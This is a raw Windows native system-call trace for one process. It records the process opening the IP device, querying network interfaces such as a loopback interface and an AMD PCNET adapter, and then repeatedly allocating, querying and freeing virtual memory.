 02198   748   NtCreateFile  (0x20000000, {24, 0, 0x40, 0, 0,  (0x20000000, {24, 0, 0x40, 0, 0, "\Device\Ip"}, 0x0, 128, 3, 3, 0, 0, 0, ... 268, {status=0x0, info=0}, ) }, 0x0, 128, 3, 3, 0, 0, 0, ... 268, {status=0x0, info=0}, ) == 0x0
 02199   748   NtCreateFile  (0x100003, {24, 0, 0x40, 0, 0,  (0x100003, {24, 0, 0x40, 0, 0, "\Device\Ip"}, 0x0, 128, 3, 3, 0, 0, 0, ... 272, {status=0x0, info=0}, ) }, 0x0, 128, 3, 3, 0, 0, 0, ... 272, {status=0x0, info=0}, ) == 0x0
 02200   748   NtCreateFile  (0x20100080, {24, 0, 0x40, 0, 1241540,  (0x20100080, {24, 0, 0x40, 0, 1241540, "\??\Ip"}, 0x0, 128, 3, 1, 64, 0, 0, ... 276, {status=0x0, info=0}, ) }, 0x0, 128, 3, 1, 64, 0, 0, ... 276, {status=0x0, info=0}, ) == 0x0
 02201   748   NtAllocateVirtualMemory  (-1, 17051648, 0, 36864, 4096, 4, ... 17051648, 36864, ) == 0x0
 02202   748   NtCreateEvent  (0x1f0003, 0x0, 0, 0, ... 280, ) == 0x0
 02203   748   NtDeviceIoControlFile  (260, 280, 0x0, 0x0, 0x120003,  (260, 280, 0x0, 0x0, 0x120003, "\0\0\0\0\0\0\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 36, 32768, ... {status=0x0, info=56}, "\0\4\0\0\0\0\0\0\1\4\0\0\0\0\0\0\1\3\0\0\0\0\0\0\200\3\0\0\0\0\0\0\0\2\0\0\0\0\0\0\200\2\0\0\0\0\0\0\0\2\0\0\1\0\0\0", ) , 36, 32768, ... {status=0x0, info=56},  (260, 280, 0x0, 0x0, 0x120003, "\0\0\0\0\0\0\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 36, 32768, ... {status=0x0, info=56}, "\0\4\0\0\0\0\0\0\1\4\0\0\0\0\0\0\1\3\0\0\0\0\0\0\200\3\0\0\0\0\0\0\0\2\0\0\0\0\0\0\200\2\0\0\0\0\0\0\0\2\0\0\1\0\0\0", ) , ) == 0x0
 02204   748   NtClose  (280, ... ) == 0x0
 02205   748   NtCreateEvent  (0x1f0003, 0x0, 0, 0, ... 280, ) == 0x0
 02206   748   NtDeviceIoControlFile  (260, 280, 0x0, 0x0, 0x120003,  (260, 280, 0x0, 0x0, 0x120003, "\0\2\0\0\0\0\0\0\0\2\0\0\0\1\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 36, 348, ... {status=0x0, info=118}, "\1\0\0\0\30\0\0\0\360\5\0\0\200\226\230\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\5\0\0\0\365@\250\25(\5\0\0\13\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\5\0\0\13\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0MS TCP Loopback interface\0", ) , 36, 348, ... {status=0x0, info=118},  (260, 280, 0x0, 0x0, 0x120003, "\0\2\0\0\0\0\0\0\0\2\0\0\0\1\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 36, 348, ... {status=0x0, info=118}, "\1\0\0\0\30\0\0\0\360\5\0\0\200\226\230\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\5\0\0\0\365@\250\25(\5\0\0\13\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\5\0\0\13\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0MS TCP Loopback interface\0", ) , ) == 0x0
 02207   748   NtClose  (280, ... ) == 0x0
 02208   748   NtCreateEvent  (0x1f0003, 0x0, 0, 0, ... 280, ) == 0x0
 02209   748   NtDeviceIoControlFile  (260, 280, 0x0, 0x0, 0x120003,  (260, 280, 0x0, 0x0, 0x120003, "\0\2\0\0\1\0\0\0\0\2\0\0\0\1\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 36, 348, ... {status=0x0, info=158}, "\3\0\1\0\6\0\0\0\334\5\0\0\0\312\232;\6\0\0\0\0\14)\271\233\363\201\201\1\0\0\0\5\0\0\0\232A\250\25k\243A\3\200\275\0\0\362\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\361\20'\0\363B\0\0}\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0B\0\0\0AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport\0", ) , 36, 348, ... {status=0x0, info=158},  (260, 280, 0x0, 0x0, 0x120003, "\0\2\0\0\1\0\0\0\0\2\0\0\0\1\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 36, 348, ... {status=0x0, info=158}, "\3\0\1\0\6\0\0\0\334\5\0\0\0\312\232;\6\0\0\0\0\14)\271\233\363\201\201\1\0\0\0\5\0\0\0\232A\250\25k\243A\3\200\275\0\0\362\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\361\20'\0\363B\0\0}\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0B\0\0\0AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport\0", ) , ) == 0x0
 02210   748   NtClose  (280, ... ) == 0x0
 02211   748   NtCreateEvent  (0x1f0003, 0x0, 0, 0, ... 280, ) == 0x0
 02212   748   NtDeviceIoControlFile  (260, 280, 0x0, 0x0, 0x120003,  (260, 280, 0x0, 0x0, 0x120003, "\0\0\0\0\0\0\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 36, 32768, ... {status=0x0, info=56}, "\0\4\0\0\0\0\0\0\1\4\0\0\0\0\0\0\1\3\0\0\0\0\0\0\200\3\0\0\0\0\0\0\0\2\0\0\0\0\0\0\200\2\0\0\0\0\0\0\0\2\0\0\1\0\0\0", ) , 36, 32768, ... {status=0x0, info=56},  (260, 280, 0x0, 0x0, 0x120003, "\0\0\0\0\0\0\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 36, 32768, ... {status=0x0, info=56}, "\0\4\0\0\0\0\0\0\1\4\0\0\0\0\0\0\1\3\0\0\0\0\0\0\200\3\0\0\0\0\0\0\0\2\0\0\0\0\0\0\200\2\0\0\0\0\0\0\0\2\0\0\1\0\0\0", ) , ) == 0x0
 02213   748   NtClose  (280, ... ) == 0x0
 02214   748   NtCreateEvent  (0x1f0003, 0x0, 0, 0, ... 280, ) == 0x0
 02215   748   NtDeviceIoControlFile  (260, 280, 0x0, 0x0, 0x120003,  (260, 280, 0x0, 0x0, 0x120003, "\200\2\0\0\0\0\0\0\0\1\0\0\0\1\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 36, 4, ... {status=0x0, info=4}, "\200\2\0\0", ) , 36, 4, ... {status=0x0, info=4},  (260, 280, 0x0, 0x0, 0x120003, "\200\2\0\0\0\0\0\0\0\1\0\0\0\1\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 36, 4, ... {status=0x0, info=4}, "\200\2\0\0", ) , ) == 0x0
 02216   748   NtClose  (280, ... ) == 0x0
 02217   748   NtCreateEvent  (0x1f0003, 0x0, 0, 0, ... 280, ) == 0x0
 02218   748   NtDeviceIoControlFile  (260, 280, 0x0, 0x0, 0x120003,  (260, 280, 0x0, 0x0, 0x120003, "\200\2\0\0\0\0\0\0\0\2\0\0\0\1\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 36, 8, ... {status=0x0, info=8}, "\1\0\0\0\3\0\1\0", ) , 36, 8, ... {status=0x0, info=8},  (260, 280, 0x0, 0x0, 0x120003, "\200\2\0\0\0\0\0\0\0\2\0\0\0\1\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 36, 8, ... {status=0x0, info=8}, "\1\0\0\0\3\0\1\0", ) , ) == 0x0
 02219   748   NtClose  (280, ... ) == 0x0
 02220   748   NtCreateSemaphore  (0x100003, 0x0, 0, 2147483647, ... 280, ) == 0x0
 02221   748   NtCreateSemaphore  (0x100003, 0x0, 0, 2147483647, ... 284, ) == 0x0
 02222   748   NtAllocateVirtualMemory  (-1, 0, 0, 65536, 8192, 4, ... 17104896, 65536, ) == 0x0
 02223   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0
 02224   748   NtAllocateVirtualMemory  (-1, 17104896, 0, 1, 4096, 4, ... 17104896, 4096, ) == 0x0
 02225   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0
 02226   748   NtFreeVirtualMemory  (-1, (0x1050000), 0, 32768, ... (0x1050000), 65536, ) == 0x0
 02227   748   NtAllocateVirtualMemory  (-1, 0, 0, 65536, 8192, 4, ... 17104896, 65536, ) == 0x0
 02228   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0
 02229   748   NtAllocateVirtualMemory  (-1, 17104896, 0, 1, 4096, 4, ... 17104896, 4096, ) == 0x0
 02230   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0
 02231   748   NtFreeVirtualMemory  (-1, (0x1050000), 0, 32768, ... (0x1050000), 65536, ) == 0x0
 02232   748   NtAllocateVirtualMemory  (-1, 0, 0, 65536, 8192, 4, ... 17104896, 65536, ) == 0x0
 02233   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0
 02234   748   NtAllocateVirtualMemory  (-1, 17104896, 0, 1, 4096, 4, ... 17104896, 4096, ) == 0x0
 02235   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0
 02236   748   NtFreeVirtualMemory  (-1, (0x1050000), 0, 32768, ... (0x1050000), 65536, ) == 0x0
 02237   748   NtAllocateVirtualMemory  (-1, 0, 0, 65536, 8192, 4, ... 17104896, 65536, ) == 0x0
 02238   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0
 02239   748   NtAllocateVirtualMemory  (-1, 17104896, 0, 1, 4096, 4, ... 17104896, 4096, ) == 0x0
 02240   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0
 02241   748   NtFreeVirtualMemory  (-1, (0x1050000), 0, 32768, ... (0x1050000), 65536, ) == 0x0
 02242   748   NtAllocateVirtualMemory  (-1, 0, 0, 65536, 8192, 4, ... 17104896, 65536, ) == 0x0
 02243   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0
 02244   748   NtAllocateVirtualMemory  (-1, 17104896, 0, 1, 4096, 4, ... 17104896, 4096, ) == 0x0
 02245   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0
 02246   748   NtFreeVirtualMemory  (-1, (0x1050000), 0, 32768, ... (0x1050000), 65536, ) == 0x0
 02247   748   NtAllocateVirtualMemory  (-1, 0, 0, 65536, 8192, 4, ... 17104896, 65536, ) == 0x0
 02248   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0
 02249   748   NtAllocateVirtualMemory  (-1, 17104896, 0, 1, 4096, 4, ... 17104896, 4096, ) == 0x0
 02250   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0
 02251   748   NtFreeVirtualMemory  (-1, (0x1050000), 0, 32768, ... (0x1050000), 65536, ) == 0x0
 02252   748   NtAllocateVirtualMemory  (-1, 0, 0, 65536, 8192, 4, ... 17104896, 65536, ) == 0x0
 02253   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0
 02254   748   NtAllocateVirtualMemory  (-1, 17104896, 0, 1, 4096, 4, ... 17104896, 4096, ) == 0x0
 02255   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0
 02256   748   NtFreeVirtualMemory  (-1, (0x1050000), 0, 32768, ... (0x1050000), 65536, ) == 0x0
 02257   748   NtAllocateVirtualMemory  (-1, 0, 0, 65536, 8192, 4, ... 17104896, 65536, ) == 0x0
 02258   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0
 02259   748   NtAllocateVirtualMemory  (-1, 17104896, 0, 1, 4096, 4, ... 17104896, 4096, ) == 0x0
 02260   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0
 02261   748   NtFreeVirtualMemory  (-1, (0x1050000), 0, 32768, ... (0x1050000), 65536, ) == 0x0
 02262   748   NtAllocateVirtualMemory  (-1, 0, 0, 65536, 8192, 4, ... 17104896, 65536, ) == 0x0
 02263   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0
 02264   748   NtAllocateVirtualMemory  (-1, 17104896, 0, 1, 4096, 4, ... 17104896, 4096, ) == 0x0
 02265   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0
 02266   748   NtFreeVirtualMemory  (-1, (0x1050000), 0, 32768, ... (0x1050000), 65536, ) == 0x0
 02267   748   NtAllocateVirtualMemory  (-1, 0, 0, 65536, 8192, 4, ... 17104896, 65536, ) == 0x0
 02268   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0
 02269   748   NtAllocateVirtualMemory  (-1, 17104896, 0, 1, 4096, 4, ... 17104896, 4096, ) == 0x0
 02270   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0
 02271   748   NtFreeVirtualMemory  (-1, (0x1050000), 0, 32768, ... (0x1050000), 65536, ) == 0x0
 02272   748   NtAllocateVirtualMemory  (-1, 0, 0, 65536, 8192, 4, ... 17104896, 65536, ) == 0x0
 02273   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0
 02274   748   NtAllocateVirtualMemory  (-1, 17104896, 0, 1, 4096, 4, ... 17104896, 4096, ) == 0x0
 02275   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0
 02276   748   NtFreeVirtualMemory  (-1, (0x1050000), 0, 32768, ... (0x1050000), 65536, ) == 0x0
 02277   748   NtAllocateVirtualMemory  (-1, 0, 0, 65536, 8192, 4, ... 17104896, 65536, ) == 0x0
 02278   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0
 02279   748   NtAllocateVirtualMemory  (-1, 17104896, 0, 1, 4096, 4, ... 17104896, 4096, ) == 0x0
 02280   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0
 02281   748   NtFreeVirtualMemory  (-1, (0x1050000), 0, 32768, ... (0x1050000), 65536, ) == 0x0
 02282   748   NtAllocateVirtualMemory  (-1, 0, 0, 65536, 8192, 4, ... 17104896, 65536, ) == 0x0
 02283   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0
 02284   748   NtAllocateVirtualMemory  (-1, 17104896, 0, 1, 4096, 4, ... 17104896, 4096, ) == 0x0
 02285   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0
 02286   748   NtFreeVirtualMemory  (-1, (0x1050000), 0, 32768, ... (0x1050000), 65536, ) == 0x0
 02287   748   NtAllocateVirtualMemory  (-1, 0, 0, 65536, 8192, 4, ... 17104896, 65536, ) == 0x0
 02288   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0
 02289   748   NtAllocateVirtualMemory  (-1, 17104896, 0, 1, 4096, 4, ... 17104896, 4096, ) == 0x0
 02290   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0
 02291   748   NtFreeVirtualMemory  (-1, (0x1050000), 0, 32768, ... (0x1050000), 65536, ) == 0x0
 02292   748   NtAllocateVirtualMemory  (-1, 0, 0, 65536, 8192, 4, ... 17104896, 65536, ) == 0x0
 02293   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0
 02294   748   NtAllocateVirtualMemory  (-1, 17104896, 0, 1, 4096, 4, ... 17104896, 4096, ) == 0x0
 02295   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0
 02296   748   NtFreeVirtualMemory  (-1, (0x1050000), 0, 32768, ... (0x1050000), 65536, ) == 0x0
 02297   748   NtAllocateVirtualMemory  (-1, 0, 0, 65536, 8192, 4, ... 17104896, 65536, ) == 0x0
 02298   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0
 02299   748   NtAllocateVirtualMemory  (-1, 17104896, 0, 1, 4096, 4, ... 17104896, 4096, ) == 0x0
 02300   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0
 02301   748   NtFreeVirtualMemory  (-1, (0x1050000), 0, 32768, ... (0x1050000), 65536, ) == 0x0
 02302   748   NtAllocateVirtualMemory  (-1, 0, 0, 65536, 8192, 4, ... 17104896, 65536, ) == 0x0
 02303   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0
 02304   748   NtAllocateVirtualMemory  (-1, 17104896, 0, 1, 4096, 4, ... 17104896, 4096, ) == 0x0
 02305   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0
 02306   748   NtFreeVirtualMemory  (-1, (0x1050000), 0, 32768, ... (0x1050000), 65536, ) == 0x0
 02307   748   NtAllocateVirtualMemory  (-1, 0, 0, 65536, 8192, 4, ... 17104896, 65536, ) == 0x0
 02308   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0
 02309   748   NtAllocateVirtualMemory  (-1, 17104896, 0, 1, 4096, 4, ... 17104896, 4096, ) == 0x0
 02310   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0
 02311   748   NtFreeVirtualMemory  (-1, (0x1050000), 0, 32768, ... (0x1050000), 65536, ) == 0x0
 02312   748   NtAllocateVirtualMemory  (-1, 0, 0, 65536, 8192, 4, ... 17104896, 65536, ) == 0x0
 02313   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0
 02314   748   NtAllocateVirtualMemory  (-1, 17104896, 0, 1, 4096, 4, ... 17104896, 4096, ) == 0x0
 02315   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0
 02316   748   NtFreeVirtualMemory  (-1, (0x1050000), 0, 32768, ... (0x1050000), 65536, ) == 0x0
 02317   748   NtAllocateVirtualMemory  (-1, 0, 0, 65536, 8192, 4, ... 17104896, 65536, ) == 0x0
 02318   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0
 02319   748   NtAllocateVirtualMemory  (-1, 17104896, 0, 1, 4096, 4, ... 17104896, 4096, ) == 0x0
 02320   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0
 02321   748   NtFreeVirtualMemory  (-1, (0x1050000), 0, 32768, ... (0x1050000), 65536, ) == 0x0
 02322   748   NtAllocateVirtualMemory  (-1, 0, 0, 65536, 8192, 4, ... 17104896, 65536, ) == 0x0
 02323   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0
 02324   748   NtAllocateVirtualMemory  (-1, 17104896, 0, 1, 4096, 4, ... 17104896, 4096, ) == 0x0
 02325   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0
 02326   748   NtFreeVirtualMemory  (-1, (0x1050000), 0, 32768, ... (0x1050000), 65536, ) == 0x0
 02327   748   NtAllocateVirtualMemory  (-1, 0, 0, 65536, 8192, 4, ... 17104896, 65536, ) == 0x0
 02328   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0
 02329   748   NtAllocateVirtualMemory  (-1, 17104896, 0, 1, 4096, 4, ... 17104896, 4096, ) == 0x0
 02330   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0
 02331   748   NtFreeVirtualMemory  (-1, (0x1050000), 0, 32768, ... (0x1050000), 65536, ) == 0x0
 02332   748   NtAllocateVirtualMemory  (-1, 0, 0, 65536, 8192, 4, ... 17104896, 65536, ) == 0x0
 02333   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0
 02334   748   NtAllocateVirtualMemory  (-1, 17104896, 0, 1, 4096, 4, ... 17104896, 4096, ) == 0x0
 02335   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0
 02336   748   NtFreeVirtualMemory  (-1, (0x1050000), 0, 32768, ... (0x1050000), 65536, ) == 0x0
 02337   748   NtAllocateVirtualMemory  (-1, 0, 0, 65536, 8192, 4, ... 17104896, 65536, ) == 0x0
 02338   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0
 02339   748   NtAllocateVirtualMemory  (-1, 17104896, 0, 1, 4096, 4, ... 17104896, 4096, ) == 0x0
 02340   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0
 02341   748   NtFreeVirtualMemory  (-1, (0x1050000), 0, 32768, ... (0x1050000), 65536, ) == 0x0
 02342   748   NtAllocateVirtualMemory  (-1, 0, 0, 65536, 8192, 4, ... 17104896, 65536, ) == 0x0
 02343   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0
 02344   748   NtAllocateVirtualMemory  (-1, 17104896, 0, 1, 4096, 4, ... 17104896, 4096, ) == 0x0
 02345   748   NtQueryVirtualMemory  (-1, 0x1050000, Basic, 28, ... {BaseAddress=0x1050000,AllocationBase=0x1050000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0
 02346   748   NtFreeVirtualMemory  (-1, (0x1050000), 0, 32768, ... (0x1050000), 65536, ) == 0x0
